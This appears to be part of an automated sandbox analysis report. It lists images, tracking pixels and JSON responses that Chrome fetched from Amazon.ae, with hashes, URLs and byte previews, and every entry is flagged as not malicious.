                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 230x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9752
                                                                                                                                                                                                                                                                Entropy (8bit):7.915303575100066
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Ueo/ZKJdh5yglNIOHfkBt3o1B6RX6n7/f+XXqUhGcMikNO:UeUK5D/rcBt3nRX67/2HqUhkNO
                                                                                                                                                                                                                                                                MD5:B260E1AD6A8C96887F6879B572F3368F
                                                                                                                                                                                                                                                                SHA1:6A206C8E27972DCAC664A234AFC41157D2BC554E
                                                                                                                                                                                                                                                                SHA-256:4B90884388EB5544BC31D9961CAD8DED296C0D6E83FF4D68E6B9A7E7134B11F8
                                                                                                                                                                                                                                                                SHA-512:BFA6EFC6F4DDF12E03D2D1422B68900C4DD60FEAD4896017F08275C422B98B9AEF483C84EDA62AA2243973A3777604CB95899C2FB520998AE2768B6E45C282B0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................).q.H....y...j.....(\._.P...T.(s...R.......q....Q..n..Me.3......o>.5c.)..'+}.e..:..W...f.*28...Y3......3>..ON}.......-w.m...{g.GV..........n~..w.'S/......G:.Y.P.jl...t....Jw.5:.>.O$Y.-.6..........K'.]d...5...5..[s.X.ol=...r...O......6.$.]..8k9....^.."-....K.[[.k2.......J,..Ux....Slk.=..n.t..[...C..@+?.5.UE.N...z.ZC..u...'.%.# #c.M%..(.1..9.c)f#G...x.4;.+5.kjs.]%....llU.))....+.N@.9...2.l....X..}p...P..D...Q.~8.s.)..n(....Z>[....yz...Y.UlV.T...j..\H..u.)B.Z.k..>m.>....yj.....x.I....._.I...PO...v...r7......g...O....:...Z&l.Ko=89.h........C..i..,.....s.F{)...9V......_q..e...Z;e...{+.6..L..z.Q..8......].=........}.y+..X.7o..Z.FU>=).VQ.K....W.oL.v..W.T.6..*z.<9GQ%z..J..YH.k..<P...:...+..l. ..n8..5.h...W..W.=.-...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12713
                                                                                                                                                                                                                                                                Entropy (8bit):7.9197486260353385
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:1HtuBh4o6vQ9DjIJ+AzEBXltwjhdHguiNI8oc++YZ/l3K21WQaQqZ8eZEjNJ7:1o2G/A2DgHgtNdox+YZM21FqpEjNF
                                                                                                                                                                                                                                                                MD5:24CEBF7991E389E13B60FDE7101C9F23
                                                                                                                                                                                                                                                                SHA1:B904A8687D7657360DDA742DAB87B4EEF95C5BEF
                                                                                                                                                                                                                                                                SHA-256:50219CF917848F2810CBD401A67C28C691A0C24F6ABA6BC518F2D76E9001F5A8
                                                                                                                                                                                                                                                                SHA-512:B10BF6562EE98EF0F6A448B7D34337EF82732E3271D41C17B80D6FEBD1866E499E2FFEB4752761795FBF0FCF03B4ED52AA411FEC3D0470AD65452338A311ED2F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Prime_learn_more_full-shopping-experience_440x300_en_AE.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ .................................................................[........-dR.........._.).{..S@as@....<?.C.s._...`~^.....m.@....Y..I..fw.4/..2..y.....n.....C.m.r...cK./...2..+G...........s...".%U.q.$..G..cR..G.YP...6...;....c.g.lh.<..q.'.....g._..j..v.8}_M.~......"..3$..!...#...|...%m..S. .=...[I.M...9...6`.<.....1.I8,....c.W=Y......l......c% ..<.v\...w..<V5..y.>..9.Q....*.....;"=.~5.2.P......q:.........,..g...k..... ......^..._..'..Y.~....fB.n..K4...b...)1..c...Q.v.]................#q.8,U.2T.QP2y?X=?....v_`.<..l.\f.{..t..e~Q.tjw..'.%*z....M.\.z.t.......B.7D.d....#...]#w..5.e2....O.........Nb....Q"...N?7.x..+....I..#l.C.s...F..c..g...>...../e.....Z......J.~H.......Mc.t...6G%....b.?...qg[........\..J.7c.X....l.^[#/.....[
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17542
                                                                                                                                                                                                                                                                Entropy (8bit):2.247918084411713
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                                                                                                                                                MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                                                                                                                                                SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                                                                                                                                                SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                                                                                                                                                SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):122
                                                                                                                                                                                                                                                                Entropy (8bit):5.350229929566833
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YMsJDR7qtRLrHhj0CWUWReVpgmivmRzK:YMecRZDWYpgXvmzK
                                                                                                                                                                                                                                                                MD5:30C1C713116797EF6C1BD69CC729B72A
                                                                                                                                                                                                                                                                SHA1:B51157B8CBADC5DE6D34B506CBC52A9A337B0274
                                                                                                                                                                                                                                                                SHA-256:B9F1E31A844BA7C945559176E1218DFA3E4E1A02AE1422D456032B08D35182CE
                                                                                                                                                                                                                                                                SHA-512:B4C9365A805DD01919B94F307734743D3103CFBFB969B37844ABB6F0F44F613157570CE1FDAD47A6C8675EEF2F984511EECA24453756FDFC72BCDD86BB76C88E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/ax/preauth?policy_handle=Retail-Checkout
                                                                                                                                                                                                                                                                Preview:{"icaEligible":true,"token":"hFfMKPFdA1bvGPztgnNf9Hytbdbp/ybxFH7PRE3nxsDPAAAAAGa6DRsAAAAB","data":{"CJ_AUTHX_552417":"C"}}
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10830
                                                                                                                                                                                                                                                                Entropy (8bit):7.957579007404196
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:DRztyNOOx3vuRiDIb2YA9luC/EGUAK6FdT8ES6kqz3cwUH:DRzEx3GsIb2Yk/wT6LTtSccwc
                                                                                                                                                                                                                                                                MD5:ED2A86BE86D853C5DC200772F1A2E1AF
                                                                                                                                                                                                                                                                SHA1:DEAF3946C824D1371352C039C60566377E5A0D1B
                                                                                                                                                                                                                                                                SHA-256:410990DC7A862FA02E5999F92AC1635F20B7FD2266B24BE7134C07AA3C625EC2
                                                                                                                                                                                                                                                                SHA-512:7F93B2D1D57763C580BEB8CD6FFF721A7034D7B7F1ADC24DCCFFAA7097E9987CEC666D8F28604DA6BD350659FCE0B35B9C5D8644B97B6A41E5E7F454F3B6E9DD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1..AQ2aq#...BRU......$3CT....4b..Dru..................................................!.1Q..ARa.."2bq.Br...................?...;.|3]..f..Ey.N.;..".Ro.q.D....l$...x....!.9.-...<r,...P.nv.[`n.(......4.\..^.....{.Oq...TS..i0.$v1...l.:....>a./.3X2.p....{..s....(....`.0.....s.P......C{.[.b~...*_!.G.h...7i[B+.Yc.......B.U../.+.j..`(T<..p...H.Y..Xw.BU......"..X..E1.c8&.~..x.i.....Eg. ....,........,.q7.g<,..*m..YfGYb-.q...........e6i.,c..p............K'...S.......x..&....0....H.n.!gd{...."....t.+.0.....8[:.(3a.M.%.D.i.Ws.*#z...........<....3.I.....)..'....H..>..Li.(.bx.C..!..n..I...g...&}]...-M).@\.Q...oe,Q....e.-.al.y....7.R..f.7.8'8..f..]37.C!A.....'.2>.....:.6..U...T(u..'S....#U.qHd<q>M.e.h.fZ....G.....X).e..}..8..w.....D..T..j..6.`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 101x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5376
                                                                                                                                                                                                                                                                Entropy (8bit):7.906155053645561
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TwUkbPaLUJYnotL77/EOydKsjgxZ/hM00lsoOwc:EUkbPaQJYoB/EOydKsMFu0k1c
                                                                                                                                                                                                                                                                MD5:8410EB51C790A4445200F4A82589D0A0
                                                                                                                                                                                                                                                                SHA1:42357146A45D9DC894F2D74A4AD919330D46070F
                                                                                                                                                                                                                                                                SHA-256:2FBBA244B248A17C52F8E4D6BACABEF25E15EBD632EA38F94B9A48D0F98085D7
                                                                                                                                                                                                                                                                SHA-512:6BDD96262C34324C5A9FB4473423684A6D2AE6E4638A1A6C8C239B529FE8067EBC564BEE9F1728E5D3BBF441C71125EFEB87EA6B205D5239EAABF969605B63F5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........e..".............................................................!..1."A2Q.Baq.#r...$R.3S.................................................!.1."Aq..2a.#....BQr............?.....h...h...h....1..7>....nv....'.`|\.G.`.WM..}.O.......wz...N.Z}.w.Q........u....Z....c....W.....%.&.....k..4.MTQ..@Y..9'.+Mpz.(A..o.........,.(E..5F.".......R..#..|..G.....MYzf?.1... [7.$.S.c.k\..U..cf.i..4.M.4.M.V.o?c..v.x.1..[.|...z...c.|h#...4...J.K..x..V.\...)!..'.D..." .O~.c{7.VC.6....Dw..i....U...>..`.c..y.-../7T|j..1 ._....$..P...G.qJ../..|..`.....a..js...z...x.9|.:i.. .M4..M4..M4.\..g....B...u...R?....,......O......<"..K{S.*.D.<.n.Rws~..]..Mc'!1cyd4..&......[.X.s.2.\.aGtH-N.....AoDQ5..q..Q|(.|..o.4.df...b.. ...6A...5e.i+....x.F.i..4.M.4.M.4.X..+1..@...N.>Fl.X+.S.;..ah.]Z..aC.W..U.F@......Il...f;A&DnC...z.jT..O.....U.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2280
                                                                                                                                                                                                                                                                Entropy (8bit):7.51964741196707
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rwUJm4xWWEt3Gu530fG9uof4r//VwnBKG8VO+Tktt3bR2M:TDmfwXGXsc3VwBKKRH12M
                                                                                                                                                                                                                                                                MD5:71288BF2C29D0E3BCBD9F3A28A599E76
                                                                                                                                                                                                                                                                SHA1:7A9D6841009DC9F525AD5AE4578121EC304E2F15
                                                                                                                                                                                                                                                                SHA-256:A592E3EFCACBCFC6F74BC766C462134214F34156C3D6A69B6C3404A40F1BFA63
                                                                                                                                                                                                                                                                SHA-512:56CD071D02BC4F02D55FE4B123593E7E4A2BDD61E65139014F9AF91F08EE2F9F54EDC027A1CFF3818056DC0EB2C8B5FA625385889FFDC31C5317F2C52B7373BD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51P+6IorDaL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..."1Q23ABRaq....#br....$t....46......................................................?...........1.m......`......UJ.c........(F=..Q...b....d...2..P.....i..m.m..s.1s.y+.)....N....-....Z.-.WB..n...1.7z.M.i.[.UZS.I..,.,..{M......q.F6.>.}.2..%. ...h....s..K..qp.......q.`n.A.'"...:.`..4.....^s...W..~usSG.92l.6...,F....^}r.?......G.j...C.m.e.A...a..|..[.jJ..................0..w.=....>n3..S.._d.hU..qVJ.....rvM..k&.z#(o.?y..f..).E.e=_..f%@Z.,BE(.x.......tC..z..Z2..:gl...(..q8(E.ZQ.OV~I.s<S.S$....r.~NEiH.&C&A.L.O...c..+.l/m.e..q...O.S5I..Q......S.uN2......G.P~d..3L..........H................~]j...\.b.~.'..m.;...o.......>e.x....s..$..I..:.lO...E..B.$M..M.'.{......"..=JPr.j...>....*...:....Q^..8M...C"y.H...K.8?Z".})..7.{/...S...p=.y:c.|..|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://aax-eu.amazon.ae/x/px/RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ/atf/%7B%22atf%22:false%7D
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):17459
                                                                                                                                                                                                                                                                Entropy (8bit):7.909726349513089
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:f77+mxwIRtjPdtcB8Lca3lIrQxRAUKrb5XuySpyDzEZX+hdoG3IxmlQhhA7GagTG:G4JRt7Fv+rQq3YynMICG3I7Ayag83
                                                                                                                                                                                                                                                                MD5:FCA4A5FFA03EB31B746D04D46423BC3B
                                                                                                                                                                                                                                                                SHA1:E53611098CFD7634F91A8304E3B378FD9DB77CE0
                                                                                                                                                                                                                                                                SHA-256:C6DFA41129050410A0C62835D1CA32B4820F25794769726D828218ECC440B662
                                                                                                                                                                                                                                                                SHA-512:4E6D91A1C28F80FDA5FC4B36334907E52B2C16F5C7A8825A5D57228870A8936CE1BE14FEC3F529C6CE5A6A993601186702E8B01FE3780177D153E73BCD459302
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/416l24m+1oL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`........................<P"......A.!...Y..d.UV......................xSX...u.....xE>..V.O.Z...-...................).!.....n^^.F..}.J..,.yF\..:.......................\.{../..v.)VfM,.&y.Ds....F....R...9..VI...2)?...&...@...............M.zW..m..w.U..........N/.u..Z-..rg>./.... Sv{k.....*....Sv..\.~.I...O... ............\.......O..}./.^.k[......5..Y..uc.._..`X.(4/^...%.....d...................S`k.R...nj.l.G.R.x.~<..;..3%n.R.>....H......%...G}..Rk................u...UX..P.YlW......e...o...gd.g..oXa19{.#...}.k.$................c..5.' .N.C.d......-.[...#V..M...VJ....N..^.0.r.H?..>=I.?#.................s..)}.....ce,.d/....zY>[...${...`[.[.pc=..20....Sa..4..............b...1..Y+.-.8.....l..v9.vwx............Q........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D6494%26pc%3D7582%26at%3D7585%26t%3D1723469085491%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:7584
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4780
                                                                                                                                                                                                                                                                Entropy (8bit):5.139653537093895
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:IdNUzZqJcru09EbtGeSDOwXhay0uqYb40STfKAHSTfXAh4DpU:IszZgc609Ej+lX0yA84fKAAXAh4DpU
                                                                                                                                                                                                                                                                MD5:903EAC418ABEC608144EBACEF2682CD4
                                                                                                                                                                                                                                                                SHA1:8B3AE1E554CD29F7ED3CB1C3337C025886F720D3
                                                                                                                                                                                                                                                                SHA-256:EB3EF95438FA6482E6F330D27264A944BFEA32268940C2C32EC3FB7CC2A806A1
                                                                                                                                                                                                                                                                SHA-512:7AA12BAF05E2E5267B4D7B5381191F705E4C875E2FE03FF5725472332B65DA9872C7AA7896229BCCD514454E6F05C64F5B1F7BB35401C1C73B500058D53E45C3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D
                                                                                                                                                                                                                                                                Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-7&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2387
                                                                                                                                                                                                                                                                Entropy (8bit):7.597714807287665
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rM/WhdqCc6bN6+ERSOQm9/QE5PtwCTvLRRKfQLy:Tx/WhdhDGQG/X5lwsLHRG
                                                                                                                                                                                                                                                                MD5:D61E4A00DA6574005B7BCD88EFB71095
                                                                                                                                                                                                                                                                SHA1:5389D3771366E42475D078BBA7313FFC2CF636A1
                                                                                                                                                                                                                                                                SHA-256:49CB88397D5550CE49993AF9519556909900BD9F807A185CB532E588CCE646DD
                                                                                                                                                                                                                                                                SHA-512:BCA9F3F5927DF5121DC2BC6728975480B975B54F0782AC6295B141A0D75BAD0389103F4BDCF1135380037CB10CC6826E946ECD3131C40801B08E246DCA209338
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61yiOUb7bNL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1Q...."2Aq..BRSbr...#3t...4Cas....%Uc...................................................!.1."3.5AQaq..............?..,.......m..%....n..w...P)w..:...v.I.m.K.c.L........`.Ys.............9.].b...C.....{.l.eOH.'..fio....(.3.{1U...>.{..3.k...<H..................).n..R&3I..vF2..].p....rH.9c..i\..$S....L.,ef.r.s..\..$a.,s..\.f.......+.....%.C..@................;<.[.'.h...`d..e...6..>uX4.......0r.r......9..a.YNU.M.f.".K.0r.g`.?5..b.N..yI.QTa..P4...&.#R.w....V..wN.$mC+....T.T....~N..................._.>.N..>....:.d..u6......?.x{...zT1T.M..8Y.].......1.#.p.7U:2|.ig..4.z.5f.jSu....p..9]..t.....N.....(.....+.Q8.f.E*.u.Mw)...5.6.%.A.}.E%d..\".....Rt.JW...4...6..v.;ss.7.zN?.zV{vvZ....{..V.....(...xY..E*..#Fj/=..Y...9.pz........,E+BR...v.k=.......~...3..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 74x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
